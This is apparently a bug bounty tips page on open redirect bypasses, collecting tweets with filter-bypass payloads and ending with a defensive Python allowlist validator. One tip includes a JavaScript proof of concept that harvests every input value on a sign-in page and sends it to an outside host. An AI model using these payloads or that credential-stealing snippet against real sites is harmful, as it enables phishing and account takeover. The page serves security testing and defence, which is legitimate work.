# Open Redirect

* [file.php?url=/admin/ Redirects to: http://website.com/admin/ Put URL file.php?url=@google.com Now it is website.com@google.com which redirects to http://google.com!](https://twitter.com/LooseSecurity/status/1164579967184887809)
* [#bugbountytip Got an Open Redirect like this before. Website redirected to its own URL with input appended to it. Input @mywebsite.com and alter conf of your site to not prompt for login. URL: victim.com@mywebsite.com (browser thinks http://victim.com is the user). #BugBounty](https://twitter.com/LooseSecurity/status/1078630347464679424)
* [in some cases you can have an Open Redirect using %0d%0a and two "/" directly on the main url: http://victim//%0d%0ahttp://google.com/](https://twitter.com/k33r0k/status/1081589568405671936)
* [#bugbounty #bugbountytip Try to change protocol to bypass open redirect protection. http://example.com -> ftp://example.com You might be lucky.](https://twitter.com/neeraj_sonaniya/status/1086911248845828101)
* [http:sitetoredirect , http%3asitetoredirect , http%253asitetoredirect](https://twitter.com/h1_kenan/status/1117084793852846080)

  [mostly works for open redirect vulnerabilities.](https://twitter.com/h1_kenan/status/1117084793852846080)
* [Hold onto your open redirects. If you ever encounter SSRF then you can bypass same-origin filters using an open redirect. If they're just blocking localhost though, then create a redirect on your own website. #SSRF #infosec #CyberSecurity](https://twitter.com/LooseSecurity/status/1114317490157494272)
* [Bug Bounty Tip: Always check the content of a Redirection Page (302/301), especially if it requires authentication. And remember a Redirection Page is a good place to test issues like CRLF injection and Open Redirection.](https://twitter.com/sandh0t/status/1008636721163067393)
* [For open redirects, try using this character: 。The website thinks it's redirecting to a page on the site, but browsers convert it to a '.' thus completing the redirect. Usage: ?url=//google。com Goes to: https://google.com URL encoded: %E3%80%82](https://twitter.com/LooseSecurity/status/1179149212874952704)
* [`/%0d/domain_address` is one of the best bypasses in account takeover stealing tokens.](https://twitter.com/kunalp94/status/1195321932612169728)
* <https://twitter.com/pdeomare/status/1205402391526486017>
* [Found an interesting open redirect bypass today. Target would only allow \*.target.com, but if you entered hxxp://evil.com%EF%BC%A1.target.com, the backend would return hxxp://evil.com/?.target.com :D #bugbounty #unicode](https://twitter.com/dubs3c/status/1222273089418878976)
* [Bug bounty advice: If you have a GET request where developers added referer-based CSRF protection, use an on-site Open Redirect for this URL to get a whitelisted website in the Referer header. In the case when you have a POST request, try to change a method to GET.](https://twitter.com/0xw2w/status/1248688218326863872)
* [Open Redirect Through HTTP Pollution Attack.](https://twitter.com/darklotuskdb/status/1260837629718740992)

  [URL -> sub.dom-co/go/https/dom-co](https://twitter.com/darklotuskdb/status/1260837629718740992)

  [1) sub.dom-co/go/https/dom-co.evil-co/ -> 404](https://twitter.com/darklotuskdb/status/1260837629718740992)

  [2) sub.dom-co/go/https/dom-co/go/https/dom-co.evil-co/ -> Redirected To Evil website](https://twitter.com/darklotuskdb/status/1260837629718740992)
* [#BugBounty #bugbountytip #infosec For Open Redirects you can bypass a lot of WAF using a special character which a lot of browsers (such as Firefox) convert into a '.' which will complete your URL.\
  \
  The character is: 。\
  Usage: redirecthere。com #CyberSecurity](https://twitter.com/LooseSecurity/status/1074705120804376576)

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-M7fCtdyZbUEhVduz58O%2F-M7g6EX6DGXjnb7vvpqH%2Fimage.png?alt=media\&token=fe5fbe62-3b79-4c5a-84e7-1ced09c12997)

* When you find XSS over open redirect on sign-in/up pages, just capture the credentials and hijack them. PoC: `javascript:inpts=document.querySelectorAll('input');info='';for(i=0;i<inpts.length;i++){info+=','+inputs[i].value};location.href='https://xhze.em/?'+info`
* Open Redirect Bypass: `/path?redirect=//2130706433` or `/path?redirect=//0x7f000001`. It will redirect you to 127.0.0.1. Thank you for the tip [@llt4l](https://twitter.com/llt4l) and [@dhyaniji](https://twitter.com/dhyaniji7)
* Many people have DMed me about this bug. As a result, I have consolidated all my processed "Open redirects" reports this month.

  Payloads that bypass most filters:

  `http:http:evil[.]com`, `http:/evil%252ecom`, `///www.x.com@evil.com`
* When you are looking for bugs like SSRF and Open Redirect and there is a blacklisted character, try to bypass it using other Unicode characters. I found an Open Redirect bypass using the (。) Chinese dot "%E3%80%82". PoC: `redirect_to=////evil%E3%80%82com` [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click) [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)
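The tips above share one root cause: the application compares the raw redirect parameter against a host or prefix string, while the browser parses it as a URL (dropping userinfo before `@`, mapping `。` to `.`, treating `//` as protocol-relative, filling in the host for `http:host`, decoding percent-escapes in the host). The following allowlist validator is an added example, not code from any of the quoted tweets; it parses the value the way a browser would and accepts only same-origin paths or absolute URLs whose canonical host is on an allowlist. `ALLOWED_HOSTS` is a constructed placeholder, and the sample payloads in the checks are the ones quoted on this page.

```python
from urllib.parse import urlsplit, unquote

# Constructed placeholder allowlist: the hosts a redirect may land on.
ALLOWED_HOSTS = {"example.com", "www.example.com"}
ALLOWED_SCHEMES = {"http", "https"}

# Label separators that IDNA/browser URL parsing maps to an ASCII '.',
# including the ideographic full stop U+3002 (%E3%80%82) quoted above.
_DOT_VARIANTS = str.maketrans({"\u3002": ".", "\uff0e": ".", "\uff61": "."})


def _has_control_chars(value: str) -> bool:
    """True if value carries C0 controls or DEL (CR/LF allow header injection)."""
    return any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value)


def canonical_host(hostname: str) -> str:
    """Normalise a parsed hostname the way a browser does before comparing it."""
    host = unquote(hostname)               # evil%E3%80%82com -> evil。com
    host = host.translate(_DOT_VARIANTS)   # evil。com -> evil.com
    return host.lower().rstrip(".")


def is_safe_redirect(raw, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Accept only a same-origin path or an absolute URL to an allowlisted host."""
    if not isinstance(raw, str) or not raw:
        return False
    # Reject CR/LF and friends both as received and after one percent-decode,
    # which catches %0d%0a payloads the framework would decode later.
    if _has_control_chars(raw) or _has_control_chars(unquote(raw)):
        return False
    # Browsers treat '\' as '/', so "/\evil.com" would become protocol-relative.
    if "\\" in raw:
        return False
    if raw.startswith("/"):
        # "/account" stays on this origin; "//host", "//2130706433" and
        # "///www.x.com@evil.com" are protocol-relative and leave it.
        return not raw.startswith("//")
    try:
        parts = urlsplit(raw)
    except ValueError:
        return False
    # ftp:, javascript:, data: and anything else never qualify.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    # "http:evil.com" parses with an empty netloc here, but a browser fills the
    # host in; "site.com@evil.com" carries userinfo that the browser discards.
    if not parts.netloc or "@" in parts.netloc:
        return False
    host = canonical_host(parts.hostname or "")
    return host in allowed_hosts


def choose_redirect(raw, fallback="/") -> str:
    """Return raw when it passes validation, otherwise a fixed same-origin path."""
    return raw if is_safe_redirect(raw) else fallback


if __name__ == "__main__":
    for payload in ("/account", "//google。com", "http://website.com@google.com/",
                    "http:evil.com", "https://evil%E3%80%82com/", "/%0d/domain_address"):
        print(f"{payload!r:45} -> {choose_redirect(payload)}")
```

The design choice worth noting is that the validator never tries to blacklist characters, which is exactly what each quoted bypass defeats; it canonicalises the host and then asks one positive question, "is this host on the allowlist?", and treats every parse oddity (userinfo, empty host, unknown scheme, control bytes) as a reason to fall back to a fixed same-origin path.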

**Blogs:**

{% embed url="<https://elmahdi.tistory.com/4>" %}
